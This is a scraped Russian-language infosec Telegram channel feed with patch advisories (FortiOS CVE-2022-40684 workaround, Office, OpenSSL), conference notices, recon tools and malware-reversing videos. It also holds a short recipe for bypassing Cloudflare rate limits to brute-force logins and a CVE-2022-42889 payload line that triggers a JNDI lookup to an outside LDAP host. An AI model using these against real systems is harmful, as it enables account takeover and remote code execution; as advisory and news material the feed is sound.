Forwarded from Ralf Hacker Channel (Ralf Hacker)
Книга - дело хорошее.
[https://cocomelonc.github.io/book/2022/07/16/mybook.html]
[https://cocomelonc.github.io/book/2022/07/16/mybook.html]
Forwarded from Devious Methods
#SOC #Blueteam #Threathunting
Боевик по мотивам противостояния Standoff 11 2022. В главных ролях: Codeby team, PT SOC team.
https://habr.com/ru/company/pt/blog/678832/
Боевик по мотивам противостояния Standoff 11 2022. В главных ролях: Codeby team, PT SOC team.
https://habr.com/ru/company/pt/blog/678832/
Хабр
Письмо ценой катастрофы: расследуем атаку на The Standoff, используя продукты Positive Technologies
Привет! В мае прошел очередной, уже 11-й, PHDays, а вместе с ним и The Standoff , и мы, как обычно, не остались без кейсов интересных атак. В этот раз мы решили не описывать отдельные техники и...
#Bypass #Cloudflare Rate Limit 2022
1. Go to login page
2. Enter credentials
3. Send request to intruder
4. Set change position for host header
5. Set change position for password
6. Enjoy brute forcing
1. Go to login page
2. Enter credentials
3. Send request to intruder
4. Set change position for host header
5. Set change position for password
6. Enjoy brute forcing
tg_image_219355491.jpeg
194.6 KB
Cyber Security Wheel
Некий наглядный индикатор зрелости компаний к ИБ и собственной защите…
Некий наглядный индикатор зрелости компаний к ИБ и собственной защите…
Forwarded from ATT&CK® COMMUNITY RUSSIA CHANNEL
Перевели официальный FAQ MITRE ATT&CK
(финализировали все формулировки )
Перевод опубликован в статье на Хабр и в разделе Вопросы и ответы на сайте сообщества.
Переводили
— Антон Шипулин, сооснователь RUSCADASEC
— Олег Скулкин, Руководитель лаборатории цифровой криминалистики и исследования вредоносного кода Group-IB
— Илья Енин, SOC Analyst Team Lead, Kaspersky Lab
— Ольга Моск, редактор, переводчик, менеджер проектов Positive Technologies
— Евгений Зудилин
— Даниил Югославский, волонтер Russians for Ukraine
Архив
Оригинальные сообщения доступны в дискуссионной комнате. Веб-версия обсуждения сохранена для индексации поисковыми системами. Zip-архив обсуждения сохранен для обеспечения целостности (неизменности), которая гарантируется хеш-функцией SHA-256:
📩 Подписаться 📩
Перевод опубликован в статье на Хабр и в разделе Вопросы и ответы на сайте сообщества.
Переводили
— Антон Шипулин, сооснователь RUSCADASEC
— Олег Скулкин, Руководитель лаборатории цифровой криминалистики и исследования вредоносного кода Group-IB
— Илья Енин, SOC Analyst Team Lead, Kaspersky Lab
— Ольга Моск, редактор, переводчик, менеджер проектов Positive Technologies
— Евгений Зудилин
— Даниил Югославский, волонтер Russians for Ukraine
Архив
Оригинальные сообщения доступны в дискуссионной комнате. Веб-версия обсуждения сохранена для индексации поисковыми системами. Zip-архив обсуждения сохранен для обеспечения целостности (неизменности), которая гарантируется хеш-функцией SHA-256:
$ shasum -a 256 archive/dc_4.zip
4b350895f49ffd77018d75e71e83115142b3c7240f80334c2ba4cdb596f7d49c archive/dc_4.zip
📩 Подписаться 📩
Telegram
ДК #4: Перевод FAQ
TODO:
1️⃣✅ adversary -> злоумышленник (обсуждение, итог)
2️⃣✅ adversary behavior/behaviors -> поведение (ед.ч) и действия (мн.ч) (обсуждение, итог)
3️⃣✅ taxonomy -> система классификаций (обсуждение, итог)
4️⃣✅ sub-techniques -> подтехники (обсуждение, итог)…
1️⃣✅ adversary -> злоумышленник (обсуждение, итог)
2️⃣✅ adversary behavior/behaviors -> поведение (ед.ч) и действия (мн.ч) (обсуждение, итог)
3️⃣✅ taxonomy -> система классификаций (обсуждение, итог)
4️⃣✅ sub-techniques -> подтехники (обсуждение, итог)…
Forwarded from Sys-Admin InfoSec
Open SysConf'22 - Сети, Ansible шаблонизация и не только
До нашей встречи на Open SysConf в г.Алматы осталось практически 10 дней и я рад презентовать Вам финальные темы докладов:
Сети (хуети) в современном датацентре
- Автор: Айдар Оспанбеков. Архитектор облака PS.kz.
- Краткое описание: С какими проблемами мы столкнулись при эксплуатации сети в публичном облаке; Как и для чего мы отказывались от VLAN в пользу VxLAN; Как строили сеть по топологии spine-leaf с BGP и FRRouting
Шаблонизация Linux систем в организациях
- Автор: Нурбиби "R0b0Cat". Системный администратор.
- Краткое описание: Доклад для тех кому нужно произвести в единый формат linux дистрибутивы в организации
Неявный превентинг констракшн
- Автор: Yevgeniy "sysadminkz". Sys-Adm.in
- Краткое описание: Неявный превентинг - такого термина в интернете не нашел, поэтому расскажу о том, как я вижу defencive подход с позиции неявной превентивной защиты. Создадим новый термин и его понимание прямо в реалтайме ✌️
Голова чтобы думать, ноги чтобы ходить - приходи на Open SysConf 14 октября в SmartPoint, г.Алматы.
Детали на сайте: https://sysconf.io
До нашей встречи на Open SysConf в г.Алматы осталось практически 10 дней и я рад презентовать Вам финальные темы докладов:
Сети (хуети) в современном датацентре
- Автор: Айдар Оспанбеков. Архитектор облака PS.kz.
- Краткое описание: С какими проблемами мы столкнулись при эксплуатации сети в публичном облаке; Как и для чего мы отказывались от VLAN в пользу VxLAN; Как строили сеть по топологии spine-leaf с BGP и FRRouting
Шаблонизация Linux систем в организациях
- Автор: Нурбиби "R0b0Cat". Системный администратор.
- Краткое описание: Доклад для тех кому нужно произвести в единый формат linux дистрибутивы в организации
Неявный превентинг констракшн
- Автор: Yevgeniy "sysadminkz". Sys-Adm.in
- Краткое описание: Неявный превентинг - такого термина в интернете не нашел, поэтому расскажу о том, как я вижу defencive подход с позиции неявной превентивной защиты. Создадим новый термин и его понимание прямо в реалтайме ✌️
Голова чтобы думать, ноги чтобы ходить - приходи на Open SysConf 14 октября в SmartPoint, г.Алматы.
Детали на сайте: https://sysconf.io
https://tttttt.me/in6uz?livestream
Стрим обзор сканера уязвимостей сетевых протоколов Above
https://github.com/in9uz/Above
Стрим обзор сканера уязвимостей сетевых протоколов Above
https://github.com/in9uz/Above
https://twitter.com/naglinagli/status/1580622895734460416?t=6rg9INmiw19VEyNj1JPd_Q&s=09
PoC for FortiOS CVE-2022-40684
PoC for FortiOS CVE-2022-40684
Forwarded from Devious Methods
🚨Fortinet предлагает workaround в статье и я ее перевел на свой лад
Summary (Описание):
ПОЛНАЯ ЖОПА… Это обход аутентификации в веб интерфейсе. Хакерам достаточно отправить один PUT запрос чтобы добавить ключ ssh пользователю admin.
Exploitation Status (Статус эксплуатации):
Искать в логах IoC:
Workaround (Заплатка на жопу):
FortiOS:
Отключитьнахуй HTTP/HTTPS интерфейс админа!
Настроить access list:
Создать Address Group:
Создать Local-in политику для разрешения доступа к менеджмент интерфейсу (пример: port1) только для определенной группы:
FortiProxy:
Отключитьнахуй HTTP/HTTPS интерфейс админа!
Настроить access list для доступа к порту 1:
FortiSwitchManager:
Отключитьнахуй HTTP/HTTPS интерфейс админа!
Affected Products (Продукты подавшие под раздачу)
FortiOS versions 5.x, 6.x are NOT impacted.
FortiOS version 7.2.0 through 7.2.1
FortiOS version 7.0.0 through 7.0.6
FortiProxy version 7.2.0
FortiProxy version 7.0.0 through 7.0.6
FortiSwitchManager version 7.2.0
FortiSwitchManager version 7.0.0
Solutions (Сделайте апргрейд ОС ASAP)
Please upgrade to FortiOS version 7.2.2 or above
Please upgrade to FortiOS version 7.0.7 or above
Please upgrade to FortiProxy version 7.2.1 or above
Please upgrade to FortiProxy version 7.0.7 or above
Please upgrade to FortiSwitchManager version 7.2.1 or above
Summary (Описание):
ПОЛНАЯ ЖОПА… Это обход аутентификации в веб интерфейсе. Хакерам достаточно отправить один PUT запрос чтобы добавить ключ ssh пользователю admin.
Exploitation Status (Статус эксплуатации):
Искать в логах IoC:
user=«Local_Process_Acess»
Workaround (Заплатка на жопу):
FortiOS:
Отключить
Настроить access list:
config firewall address
edit "my_allowed_addresses"
set subnet <MY IP> <MY SUBNET>
end
Создать Address Group:
config firewall addrgrp
edit "MGMT_IPs"
set member "my_allowed_addresses"
end
Создать Local-in политику для разрешения доступа к менеджмент интерфейсу (пример: port1) только для определенной группы:
config firewall local-in-policy
edit 1
set intf port1
set srcaddr "MGMT_IPs"
set dstaddr "all"
set action accept
set service HTTPS HTTP
set schedule "always"
set status enable
next
edit 2
set intf "any"
set srcaddr "all"
set dstaddr "all"
set action deny
set service HTTPS HTTP
set schedule "always"
set status enable
end
FortiProxy:
Отключить
Настроить access list для доступа к порту 1:
config system interface
edit port1
set dedicated-to management
set trust-ip-1 <MY IP> <MY SUBNET>
end
FortiSwitchManager:
Отключить
Affected Products (Продукты подавшие под раздачу)
FortiOS versions 5.x, 6.x are NOT impacted.
FortiOS version 7.2.0 through 7.2.1
FortiOS version 7.0.0 through 7.0.6
FortiProxy version 7.2.0
FortiProxy version 7.0.0 through 7.0.6
FortiSwitchManager version 7.2.0
FortiSwitchManager version 7.0.0
Solutions (Сделайте апргрейд ОС ASAP)
Please upgrade to FortiOS version 7.2.2 or above
Please upgrade to FortiOS version 7.0.7 or above
Please upgrade to FortiProxy version 7.2.1 or above
Please upgrade to FortiProxy version 7.0.7 or above
Please upgrade to FortiSwitchManager version 7.2.1 or above
FortiGuard Labs
PSIRT | FortiGuard Labs
None
Срочно обновлять офис…
Microsoft Word Remote Code Execution Vulnerability CVE-2022-41031 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41031) and Microsoft Office Graphics Remote Code Execution Vulnerability CVE-2022-38049 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38049)
#MSOffice #RCE #CVE
Microsoft Word Remote Code Execution Vulnerability CVE-2022-41031 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41031) and Microsoft Office Graphics Remote Code Execution Vulnerability CVE-2022-38049 (https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38049)
#MSOffice #RCE #CVE
#CVE-2022-42889 #Apache #RCE #4Shell
Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.
Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell
CVE-ID: CVE-2022-42889
CVSS Score: 9.8
Дата публикации сведений об уязвимости: 17.10.2022
Уязвимые программные продукты:
• JDK 1.8.0_341
• JDK version 9.0-16.0
Рекомендации по устранению уязвимости:
В кратчайшие сроки обновить версию уязвимой библиотеки до актуальной.
Дополнительные материалы:
https://www.rapid7.com/blog/post/2022/10/17/cve-2022-42889-keep-calm-and-stop-saying-4shell/
---
Payload:jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");
SecuriXy.kz
#CVE-2022-42889 #Apache #RCE #4Shell Обнаружена критическая уязвимость в программном обеспечении Apache (CVE-2022-42889) именуемая 4Shell CVE-ID: CVE-2022-42889 CVSS Score: 9.8 Дата публикации сведений об уязвимости: 17.10.2022 Уязвимые программные продукты:…
Check with ansible
:
- hosts: CHANGEME
become: yes
become_user: CHANGEME
tasks:
- name: Check if java is installed
command: java -version
register: java_result
ignore_errors: True
- debug:
msg: "Failed - Java is not installed"
when: java_result is failed
- debug:
msg: "Success - installed Java version: {{ java_result }}"
when: java_result is success
OpenSSL 3.0.7 is a security-fix release. The highest severity issue fixed in this release is CRITICAL (from 2016)
https://mta.openssl.org/pipermail/openssl-announce/2022-October/000238.html
https://mta.openssl.org/pipermail/openssl-announce/2022-October/000238.html
Forwarded from TSARKA (official channel)
Друзья, специально для вас, мы выложили запись докладов с большой сцены на наш YouTube-канал!
Вспомним еще раз, как это было!
DAY 1: GOVERNMENT AND BUSINESS DAY
https://youtu.be/Z5mVjVtRv5k
DAY 2: SECURE CODING/DEVELOPMENT DAY
https://youtu.be/xbbzEDE3mns
DAY 3: HACK DAY
https://youtu.be/XTBpW2kCjAM
Приятного просмотра!
Не забывайте подписываться на наш канал и ставить лайки🔥
Вспомним еще раз, как это было!
DAY 1: GOVERNMENT AND BUSINESS DAY
https://youtu.be/Z5mVjVtRv5k
DAY 2: SECURE CODING/DEVELOPMENT DAY
https://youtu.be/xbbzEDE3mns
DAY 3: HACK DAY
https://youtu.be/XTBpW2kCjAM
Приятного просмотра!
Не забывайте подписываться на наш канал и ставить лайки🔥
ReNgine is a very complete recon tool that can be very helpful to centralize all your recon in one site.
Its main website defines it as: «The only web application recon tool you will ever need!«
Currently is capable of performing:
* Subdomain Discovery
* Vulnerability Detection
* IPs and Open Ports Identification
* Directory and files fuzzing
* Screenshot Gathering
* Endpoints Gathering
* OSINT
Отличная вещь, оч рекомендую
https://github.com/yogeshojha/rengine
Its main website defines it as: «The only web application recon tool you will ever need!«
Currently is capable of performing:
* Subdomain Discovery
* Vulnerability Detection
* IPs and Open Ports Identification
* Directory and files fuzzing
* Screenshot Gathering
* Endpoints Gathering
* OSINT
Отличная вещь, оч рекомендую
https://github.com/yogeshojha/rengine
GitHub
GitHub - yogeshojha/rengine: reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable…
reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines, recon data correlation and organization, continuous ...
https://cvetrends.com
Позволяет мониторить тенденций CVE в режиме реального времени. Агрегация информации: из Twitter, NIST NVD, Reddit и GitHub.
Рекомендую добавить во вкладку инструментария аналитика SOC либо выводит сразу на экран.
Позволяет мониторить тенденций CVE в режиме реального времени. Агрегация информации: из Twitter, NIST NVD, Reddit и GitHub.
Рекомендую добавить во вкладку инструментария аналитика SOC либо выводит сразу на экран.
CVE Trends
CVE Trends - crowdsourced CVE intel
Monitor trending CVEs in real-time; crowdsourced intel sourced from Twitter, NIST NVD, Reddit, and GitHub.
#Автоматизация рутинной работы
В дополнение к сервису выше,
Если Вам нужно переодически проверять наличие публично доступных POC для CVE и искать их руками по интернет-ресурсам это не по админски - просто добавьте симлинки на команды в ~/.bashrc или ~/.zshrc и затем обновите `source ~/.zshrc` :
//Эта выдаст всю информацию по конкретному CVE
Использовать как
//Эта выведет линки на гит репозитории с нужным CVE
В дополнение к сервису выше,
Если Вам нужно переодически проверять наличие публично доступных POC для CVE и искать их руками по интернет-ресурсам это не по админски - просто добавьте симлинки на команды в ~/.bashrc или ~/.zshrc и затем обновите `source ~/.zshrc` :
//Эта выдаст всю информацию по конкретному CVE
Использовать как
cve CVE-2022-4288
9
cve() {curl "https://poc-in-github.motikan2010.net/api/v1/?cve_id=$1" | jq '.pocs[]'}
//Эта выведет линки на гит репозитории с нужным CVE
cve_url CVE-2022-4288
9
cve_url() {curl "https://poc-in-github.motikan2010.net/api/v1/?cve_id=$1" | jq '.pocs[] | .html_url'}
Очень познавательное видео о том, как декриптить стандартную нагрузку Cobalt Strike beacon под powershell и доставать IP c2 сервера.
https://youtu.be/5GUx_6xWoeI
https://youtu.be/5GUx_6xWoeI
YouTube
Reverse Engineering a Cobalt Strike PowerShell Beacon
In this video, I will show you how to reverse a Cobalt Strike stager beacon that has been loaded via PowerShell. We create a SIEM rule to detect the beacon installation and then reverse the beacon with CyberChef to find the C2 server.
CyberChef Recipe:
From_Base64('A…
CyberChef Recipe:
From_Base64('A…
Вот такой же ролик, только для выдергивания IP из исполняемого файла с автоматизацией через CiberChef API + Postman (можно хоть Burp или python использовать)
https://www.youtube.com/watch?v=5Vz1CjzhvLg
https://www.youtube.com/watch?v=5Vz1CjzhvLg
YouTube
Automating C2 Beacon Reversals with CyberChef and Postman
In today's video, I will show you how to start down the path of automating actions with the CyberChef server API. If you can come up with a repeatable recipe you can automate it with many different scripting or programming languages. I will show you how to…